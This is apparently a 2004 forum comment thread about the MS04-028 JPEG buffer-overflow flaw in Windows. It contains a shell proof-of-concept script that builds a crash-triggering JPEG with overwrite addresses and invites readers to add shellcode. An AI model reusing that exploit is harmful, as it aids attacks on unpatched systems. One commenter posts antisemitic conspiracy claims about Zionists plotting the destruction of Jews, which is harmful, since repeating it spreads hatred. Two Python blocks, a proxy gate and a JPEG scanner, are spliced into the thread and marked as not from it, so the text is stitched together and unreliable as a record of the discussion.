What's the world coming to when a man can't even trust his primary source of illegally and anonymously redistributed leeched fetish porn?
These people make me sick.
Does this mean that lynx is still vulnerable?
You are standing in an open server west of a blue house, with a boarded front door. There is an Exchange mailbox here.
* Eye of Gnome seemed to work okay, but I got all sorts of weird redraw problems when I tried to resize the window.
* Gimp (2.1) says the JPEG is unsupported and couldn't be imported by the filter, then segfaults.
* Konqueror seems to work okay, but just shows a tall black rectangle, and its spinner is still chugging away, as if it's still busy loading something.
* Firefox 0.9.3 has no troubles at all; it just shows a nice white rectangle on a white background
These programs are not vulnerable to the exploit in the same way that Windows machines are vulnerable. In fact, the issues you saw appear to be in no way related to the intended result of the virus. GIMP's segfault seems to be the most serious of these, and it is still a minor problem. I believe all of your results can be achieved by opening a mangled/corrupted
Nutshell: One cannot conclude that graphics-related processes/apps on Linux machines are vulnerable to this virus.
PS Conclusions posited based on "unprofessional research and wild conjectures" are likely to cause much more harm than good. Is this really necessary? (not a flame - just an observation)
I want to drag this out as long as possible. Bring me my protractor.
Folks, can we please not post a direct link without the disclaimer? It seems to me to be a bit beyond rude.
For the record, here's the disclaimer (which I find silly, but that's not the point, I didn't decide to take on the exposure of hosting this thing for the researchers who will need access):
I don't know much of Linux internals, but I don't think it is obvious that it is vulnerable just because programs can get confused by unexpected data.
and be done with the problem once and forever?
;)
No, seriously
Or at least create one that warns victims about the hole..
Well actually it might be good too, this will probably further hasten the fall of IE and windows.
Be quick.
Sample squid code:
Or, more reasonable:
and stick 209.171.43.27 into that file (and all following IPs that will use that code).
Then use ClamAV to scan your squid-cache the next couple of days and remove infected files.
And I've already seen the first ones bumping into my virus scanners (which luckily have a patch for these malformed jpgs)...
Just don't allow Windows boxes on the network. Problem solved....
Think Deeply.
I've taken this as a good opportunity to mail all my contacts who I know still use IE at the instance of corporate IT departments, asking them to suggest to their departments the immediate ability to install an alternative such as Firefox. I'm sure many others here do something similar, but for anyone who has not, it's situations like this which unfortunately can help us to promote a safer alternative browsing platform for all of us.
"Count on this: If any 'terrorism' happens in the next 5 weeks, you can be sure it will have been be aided and abetted by the US and/or Israeli secret services."
uhm, WHAT?!?!?
i agree with parent, GP is a paranoid conspiracy anti semitic nut.
When I was at college, all of the computers ran NT 3.51. So it was a common occurrence to enter a computer lab and see 1/4 of the computers sitting at the blue screen of death. There was a dramatic increase in quality when they upgraded all of the existing machines to NT4. Blue screens were very rare. Then again they waited for service pack 4 before upgrading, so I'm sure the previous versions were not as solid.
Well.. maybe. Or Maybe not. But Definitely not sort of.
This could possibly be the worst viruses yet!
Even MS Word's grammar feature would have caught this one...
There's been some discussion of the problems facing "fleet operators" due to this bug. It seems that various product teams have spewed so many private versions of the .DLLs all over users' systems that the people who maintain the security-patch list in XML just gave up. SMS won't detect the need for the patch, and neither will MBSA, I'm told. Whether SUS (standalone, not the Feature Pack for SMS) will is not yet clear.
Well, that's just dandy. I've got 200 machines that need patching and no centralized tools, maybe. Oh, joy.
Now I'm wondering how I'll ever trust those tools again.
> I want to see what GraphicConverter does with this.
I'm not cruising the alt.binaries.erotica.* groups for the p0rn, I'm doing field research on this new trojan.
Some mornings it's hardly worth chewing through the restraints to get out of bed.
... does this qualify as sabotage of Usenet by Micro$oft?
Since the .net framework is listed as vulnerable and RSS readers typically use it, will they need patching?
The developers have set up Doom3 and the The Sims 2 to run as "root" (Windows) for a very good reason, and it's not because of programming incompetence. The reason they have done this is because both games are considered "adult" and not to be played by kids. This is why you need admin privileges, it's an attempt to "password protect" those games that are adult in nature. ICQ has explicitly stated, as a matter of fact, that this is why you need admin privileges to run it.
"Implications", not "implementations". I noticed just after I hit Submit. Sorry; I just got up.
Worst. Post. Ever.
Is some freshman psychology major going to format their drive, back up all their files, and install Linux? No. Are they going to be able to use Linux? Doubtful. Is linux going to detect their generic sound cards and network adapters? Yeah, right. Are you going to have chaos and pissed off students? Yes. Are you going be the one to tell them they can't use their brand new Dell without totally fucking re-doing all of the software or are you going to tell them it's worthless and to go spend $1000 on a new Mac?
You are seriously fucking stupid. Start living in the real world.
Linux isn't vulnerable to this particular image. In this case it only affects Microsoft's software.
-1 FUD slinging
Transparently proxy web access. Log access to the norton AV update site, just a timestamp and an IP. Then you have a log of IP addresses and whether they have Norton installed, and the last time they updated.
If they don't update every two weeks, then trigger the transparent proxy so that any access to anything other than the Norton update page and the local page for downloading NAV displays a static page that says "Your access is blocked until you update your AV software." Give them a download link to grab their copy from.
It seems to me that you have a perfectly legitimate right to restrict access to a commons only to people who have taken steps to not be a threat to others in that area. You can require people to get immunized before going on a trip where they'll be in close contact with other people, so it seems you can require people to immunize their computers before you let them use YOUR equipment to put them in close proximity to other people's equipment.
How long will it be before a bunch of students sue a university to recoup cleanup costs because the university did not exercise due diligence in maintaining a clean network, when doing so is clearly technically feasible.
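The update-gate above, worked through as an added example (not code from the thread): it reads squid-style access log lines, records the last time each client fetched the AV vendor's update host, and applies the "only the update host and the local download page" rule to gated clients. The vendor host, local download URL and log lines are constructed placeholders.

```python
"""Proxy-log check for an AV-update gate on a transparent proxy.

Added example, not from the thread. Log lines follow squid's native
access.log layout (time elapsed client code/status bytes method url ...);
the hosts and addresses below are constructed, not real infrastructure.
"""
from datetime import datetime, timedelta, timezone

UPDATE_HOST = "liveupdate.av-vendor.example"      # assumed vendor update host
LOCAL_DOWNLOAD = "http://av.campus.example/nav/"  # assumed local NAV download page
MAX_AGE = timedelta(days=14)                      # "every two weeks" from the post

def _host(url):
    """Host part of an absolute URL ('http://h/p' -> 'h'), lower-cased."""
    return url.split("//", 1)[-1].split("/", 1)[0].lower()

def parse_squid_lines(lines):
    """Return (set of client IPs seen, {client: last update-host fetch time})."""
    seen, last_update = set(), {}
    for line in lines:
        fields = line.split()
        if len(fields) < 7:
            continue  # malformed or truncated line; skip it
        ts, client, url = float(fields[0]), fields[2], fields[6]
        seen.add(client)
        if _host(url) != UPDATE_HOST:
            continue
        when = datetime.fromtimestamp(ts, tz=timezone.utc)
        if client not in last_update or when > last_update[client]:
            last_update[client] = when
    return seen, last_update

def clients_to_gate(seen, last_update, now):
    """Clients that never fetched an update, or not within MAX_AGE of `now`."""
    return {ip for ip in seen
            if ip not in last_update or now - last_update[ip] > MAX_AGE}

def decide(client, url, gated):
    """Per-request proxy rule: gated clients may reach only the update host
    and the local download page; everyone else is allowed through."""
    if client not in gated:
        return "allow"
    if _host(url) == UPDATE_HOST or url.startswith(LOCAL_DOWNLOAD):
        return "allow"
    return "block"

# Constructed sample log: 10.0.0.5 updated on 2004-09-20, 10.0.0.9 on
# 2004-09-01, and 10.0.0.12 has only ever browsed the web.
SAMPLE_LOG = """\
1094000000.512    310 10.0.0.9 TCP_MISS/200 2048 GET http://liveupdate.av-vendor.example/minitri.flg - DIRECT/192.0.2.10 text/plain
1095700000.104    245 10.0.0.5 TCP_MISS/200 5120 GET http://liveupdate.av-vendor.example/minitri.flg - DIRECT/192.0.2.10 text/plain
1095800000.771     98 10.0.0.12 TCP_HIT/200 14220 GET http://slashdot.org/ - NONE/- text/html
1095800100.200    120 10.0.0.9 TCP_MISS/200 900 GET http://www.example.net/news - DIRECT/192.0.2.20 text/html
""".splitlines()
NOW = datetime(2004, 9, 27, tzinfo=timezone.utc)

if __name__ == "__main__":
    seen, last = parse_squid_lines(SAMPLE_LOG)
    gated = clients_to_gate(seen, last, NOW)
    print("gated clients:", sorted(gated))
    print(decide("10.0.0.9", "http://slashdot.org/", gated))
```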
I don't want to make you feel stupid, but the argument you present here is actually a common misconception; I believed it once as well until I began to examine the puzzle more closely.
Try thinking of it this way.
Your trying to discredit the idea of, "The Conspiracy," through ridicule (re, "CUCKOO, CUCKOO"), is in fact part of the very same 'Conspiracy'. --But you didn't take orders, nor did you receive an envelope from a shadowy figure. Still, this doesn't alter the fact that you are a part of a large group of people engendering a certain belief system, and that you are affecting how the world filters and perceives data and events. --If you get enough people doing as you do, repeating, "He's Crazy" often enough, then the perception is created of a sort of 'moral majority' at work. And people can be counted on in most cases to react in a few very specific ways;
-People, on a gut level, will Fear the ideas being ridiculed and want to look away or in fact join in the chorus of disagreement so as to be part of the 'popular' crowd and thus avoid being ostracized themselves. This social programming is typically installed during childhood on school yards, and it is one of the most powerful methods to control population behavior in use today.
That is, ridiculing and heaping social abuse upon a subject with enough strength will cause the rest of the world to look the other way. Almost every time. Amazing! And yet, where is the 'Vast Conspiracy?' to make this happen?
Oh, it's there. It's just far more effective than most people give it credit, and far more invisible. The interesting fact is that when it is in full effect, conspirators do not NEED to keep secrets because the population is actively, deliberately looking the other way.
That's why the points you raise about the impossibility of thousands of people keeping a secret, (while true!), is not an issue.
And let's look at an example of a recent 'conspiracy' which was caught, which has massive implications, and which everybody ignored, choosing instead to believe in the installed falsehood.
--This recent story about Canwest Global [www.cbc.ca], which owns much of the news pie in Canada is an excellent example of a small number of people influencing millions in regard to the activities of Zionist Israel.
There are those two charged words; ask yourself. . . Are you reacting at this moment rationally or emotionally?
-FL
Interestingly, this is not wholly accurate. --It suggests that ALL Jews want to control everything, whereas my experience with Jews tells me that the power-mongers are, as in other nations, a small number of elite. Their supporters are either connected to that elite, or are, largely, programmed masses.
Zionism is masked as a Jewish creation. Zionism, after the history is examined, is clearly a manipulative force which has through many, many means, artificially created threats of all types to Jews in other nations, both direct and indirect, pushing them to re-locate to Israel. There is plenty of evidence of Zionist ties with the Third Reich and various non-Jewish power brokers such as Rothschildes, and of course, the US government.
The end goal, as I have said before, is to "Put all the eggs in one basket" to enable a more effective termination of the Jewish blood lines, and that this is one of the primary objectives to the coming World War.
The Jews are one of the most heavily manipulated groups on the planet, and one which is being herded ever closer toward self-destruction.
I don't see it as being avoidable at this point, but perhaps with continued warnings and muck-raking, some people living in Israel, or who are planning to move there, will wake up and perhaps manage to avoid the hammer before it falls.
-FL
I welcome it! But please, be sure to also review and include the other two or three comments I've made in responses to the others who commented on my post.
--I think it may be very likely that you are jumping to conclusions regarding my intent and beliefs. In any case, I'd be fascinated to know what your teacher's take would be.
-FL
Forcing your customers to run a less secure system as a way of enforcing the 'adult' rating sounds like a dumb idea, oh and by the way I'm feeling cynical, and I'm a developer myself, so I'll just go ahead and say that I'm 99% sure this stuff is total garbage - it's just that they couldn't be bothered to make the games run if you're not admin.
I bet that problem was found in beta-testing for both games, and they decided not to fix it, and cooked up some bollocks about won't somebody please think of the children instead.
It's not due to programming incompetence per se - I'm guessing timescales/perceived small scale of the problem caused it not to be fixed.
Cynical old me :)
See http://www.openwall.com/advisories/OW-002-netscape-jpeg/.
I meant Sirius.
no it has the 2gb limit as well. i dont know where there is a setting to enable some other amount of space.
I have a 1.9gb .pst file that's horribly corrupted (well it's actually "fixed" according to Microsoft as Outlook locks the file so that it won't actually corrupt; I can not however delete any messages out of it or anything).
This is due to the 2gb bug that affects most 32bit things (i.e. it's all 1's). I just, coincidentally enough, ran across this problem with a user this morning. I am thinking of switching him to Thunderbird but there is no calendar and lord knows no one can work without a calendar!
There's a tool that lobotomizes like 50megs RANDOMLY out of the store file which would presumably allow you to get in there and delete messages. I haven't tried it yet.
(horribly offtopic, I know)
I'll just use my special getting high powers one more time...
CSS file for your browser.
For example, to block 1x1 and 0x0 pics and stuff from doubleclick in firefox, add the following CSS stuff into your $MOZILLA/chrome/userContent.css file:
*[width="0"][height="0"],
*[width="1"][height="1"],
*[src*=".doubleclick.net/"] { /* *= is a substring match; literal '*' in the value would never match */
display: none;
visibility: hidden;
}
I don't think it's a matter of making the format backwards compatible (I'm sure it already is, from 0.7 at least). Pretty sure most extensions are compatible, just that the devs only sanction them up to the current ff/moz version because that's all they've tested on. You could edit the source yourself... Anyhow I agree that it sucks, I lost quite a few useful extension too bugmenot (but I can use the webpage) and quicknote (which really sucks because I used that a lot), and javascript console viewer (which isn't so useful since I'm not using js anymore).
If you like you can edit the extension to be compatible, download the .xpi file and rename it to a zip, extract the install.rdf file and open it with a text editor. There you can edit the maxversion, then put the new install.rdf back in the zip, rename it back to xpi and open with firefox. Of course you use this at your own risk because something *might* have been broken between versions.
Hopefully now we've hit the 1.0 series the extensions can be made compatible for all 1.x versions.
He who defends everything, defends nothing. -- Fredrick The Great
Proof of concept exploit that creates a jpeg image to test for the buffer overrun vulnerability discovered under Microsoft Windows. Shellcode and valid addresses have been removed. /* CAN-2004-0200 */
#!/bin/sh
#
# The JPEG vuln is triggered by the 0 or 1 length field with an integer flaw
# The crafted JPEG header makes Windows crash a couple of different ways
# 1) First, it crashes when the image is opened.
# 2) Second, it crashes when hovering the mouse over the image.
#
# The pointer overwrite is pretty straight forward in a debugger
#
# Usage:
# sh ms04-028.sh > clickme.jpg
#
# Note: This isn't a ./hack
# - Plug in shellcode and get the address
# - You non-kiddies out there are smart enough to fill in the blanks
# - Until you do the above, it's just a stupid PoC crash
#
# It's ugly, but it works :)
#
# -perplexy-
#JPEG header 'n stuff
printf "\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46"
printf "\x00\x01\x01\x01\x00\x60\x00\x60\x00\x00"
#Trigger string - 00 length field (01 works too)
printf "\xFF\xFE\x00\x00"
printf "\x45\x78\x69\x66\x00\x00\x49\x49\x2A\x00\x08\x00"
# 1) Opening directly in IE
#Address to overwrite = RtlEnterCriticalSelection() - 4
#Check page 172 of SC Handbook for those of you playing along at home
printf "\x1C\xF0\xFD\x7F"
# 1) Opening directly in IE
#Address of shellcode
printf "\x41\x41\x41\x41"
#Other stuff
printf "\x96\x02\x00\x00\x1A\x00\x00\x00"
# 2) MouseOver in IE
#Address to overwrite = RtlEnterCriticalSelection() - 4
#Check page 172 of SC Handbook for those of you playing along at home
printf "\x1C\xF0\xFD\x7F";
# 2) MouseOver in IE
#Address of shellcode
printf "\x41\x41\x41\x41"
#Comments here
perl -e 'print "A"x1000';
#Image junk here
printf "\x00\x00\x00\xFF\xDB\x00\x43\x00\x08\x06\x06\x07\x06\x05\x08\x07\x07";
printf "\x07\x09\x09\x08\x0A\x0C\x14\x0D\x0C\x0B\x0B\x0C\x19\x12\x13\x0F\x14";
printf "\x1D\x1A\x1F\x1E\x1D\x1A\x1C\x1C\x20\x24\x2E\x27\x20\x22\x2C\x23\x1C";
printf "\x1C\x28\x37\x29\x2C\x30\x31\x34\x34\x34\x1F\x27\x39\x3D\x38\x32\x3C";
printf "\x2E\x33\x34\x32\xFF\xDB\x00\x43\x01\x09\x09\x09\x0C\x0B\x0C\x18\x0D";
printf "\x0D\x18\x32\x21\x1C\x21\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf "\x32\x32\x32\x32\x32\xFF\xC0\x00\x11\x08\x00\x03\x00\x03\x03\x01\x22";
printf "\x00\x02\x11\x01\x03\x11\x01\xFF\xC4\x00\x1F\x00\x00\x01\x05\x01\x01";
printf "\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05";
printf "\x06\x07\x08\x09\x0A\x0B\xFF\xC4\x00\xB5\x10\x00\x02\x01\x03\x03\x02";
printf "\x04\x03\x05\x05\x04\x04\x00\x00\x01\x7D\x01\x02\x03\x00\x04\x11\x05";
printf "\x12\x21\x31\x41\x06\x13\x51\x61\x07\x22\x71\x14\x32\x81\x91\xA1\x08";
printf "\x23\x42\xB1\xC1\x15\x52\xD1\xF0\x24\x33\x62\x72\x82\x09\x0A\x16\x17";
printf "\x18\x19\x1A\x25\x26\x27\x28\x29\x2A\x34\x35\x36\x37\x38\x39\x3A\x43";
printf "\x44\x45\x46\x47\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64";
printf "\x65\x66\x67\x68\x69\x6A\x73\x74\x75\x76\x77\x78\x79\x7A\x83\x84\x85";
printf "\x86\x87\x88\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99\x9A\xA2\xA3\xA4";
printf "\xA5\xA6\xA7\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xC2\xC3";
printf "\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE1";
printf "\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8";
printf "\xF9\xFA\xFF\xC4\x00\x1F\x01\x00\x03\x01\x01\x01\x01\x01\x01\x01\x01";
printf "\x01\x00\x00\x00\x00\x00\x00
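The defender's side of the condition the PoC comments describe (a marker segment whose 16-bit length field is 0 or 1, so "length - 2" underflows): an added example, not the thread's or the PoC author's code, that walks a JPEG's header segments and flags that case plus truncated segments, the kind of check a cache or mail scanner can apply. The sample JPEG bytes are constructed.

```python
"""Header-walk check for the MS04-028 length-field condition in a JPEG.

Added example, not from the thread or the PoC above. It walks the marker
segments that precede SOS and flags any whose 16-bit length (which counts
its own two bytes) is 0 or 1, as well as segments that run past the end of
the data. Samples at the bottom are constructed.
"""
import struct

SOI, EOI, SOS, TEM = 0xD8, 0xD9, 0xDA, 0x01
STANDALONE = {SOI, EOI, TEM} | set(range(0xD0, 0xD8))  # RST0-7: no length field

def scan_jpeg_segments(data: bytes) -> list:
    """Return a list of (marker_offset, marker, message) findings; an empty
    list means every header segment before SOS was well-formed."""
    findings = []
    if len(data) < 2 or data[0] != 0xFF or data[1] != SOI:
        return [(0, None, "missing SOI marker; not a JPEG stream")]
    pos = 2
    while pos < len(data):
        start = pos
        if data[pos] != 0xFF:
            findings.append((pos, None, "expected 0xFF marker prefix"))
            break
        while pos < len(data) and data[pos] == 0xFF:  # skip 0xFF fill bytes
            pos += 1
        if pos >= len(data):
            findings.append((start, None, "stream ends inside a marker"))
            break
        marker = data[pos]
        pos += 1
        if marker == EOI:
            break
        if marker in STANDALONE:
            continue
        if marker == SOS:
            break  # entropy-coded data follows; the header walk is done
        if pos + 2 > len(data):
            findings.append((start, marker, "truncated before length field"))
            break
        (length,) = struct.unpack(">H", data[pos:pos + 2])
        if length < 2:
            findings.append((start, marker, f"length field {length} < 2: "
                             "payload size underflows (MS04-028 trigger condition)"))
            break
        if pos + length > len(data):
            findings.append((start, marker,
                             f"segment length {length} runs past end of file"))
            break
        pos += length
    return findings

# Constructed samples: a standard JFIF APP0 header followed by a COM segment.
JFIF_APP0 = bytes.fromhex("FFD8 FFE0 0010 4A464946 00 0101 01 0060 0060 0000")
GOOD = JFIF_APP0 + b"\xFF\xFE" + struct.pack(">H", 4) + b"ok" + b"\xFF\xD9"
ZERO_LENGTH = JFIF_APP0 + b"\xFF\xFE\x00\x00" + b"\x00" * 8   # COM with length 0
TRUNCATED = JFIF_APP0 + b"\xFF\xFE\x00\x40" + b"x" * 5        # claims 64 bytes

if __name__ == "__main__":
    for name, sample in [("good", GOOD), ("zero", ZERO_LENGTH), ("trunc", TRUNCATED)]:
        print(name, scan_jpeg_segments(sample) or "clean")
```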
umm.. isn't college for learning?
...these aren't my real teeth.
I mean that firefox should (within reason) retain your previous plugins when you perform an upgrade..
It may do now.. haven't upgraded in a while (since before they had pretty installers and such)..
Of course if you have a plugin that relies on said vulnerability, the plugin no longer runs correctly.. but I think the chances of this are relatively slim..
I've actually been holding off upgrading because I hate trying to find and install all the plugins again (especially the good version of Adblock!!)..
i hate pansy republicans
Geez, you guys don't get it when someone is supposed to be funny? But also it's not impossible to do this in the real world. There is a security company that does not allow Windows machines to connect to its corporate network at all. In the real world the school can require the students to buy a particular computer. It might be a Windows box, an Apple, or Linux. I remember a school that required all CS students to have an Amiga!!
Think Deeply.
Right, but how would Firefox know which plug-ins were affected by the vulnerability and which were not? Do the plug-ins only call the Firefox API, or do some of them have their own API?
For example, one of the extensions I use is Image Zoom. Was this extension affected by the JPEG vulnerability? And if yes, will updating Firefox fix the vulnerability in the extension too?
That's a very very interesting question
i hate pansy republicans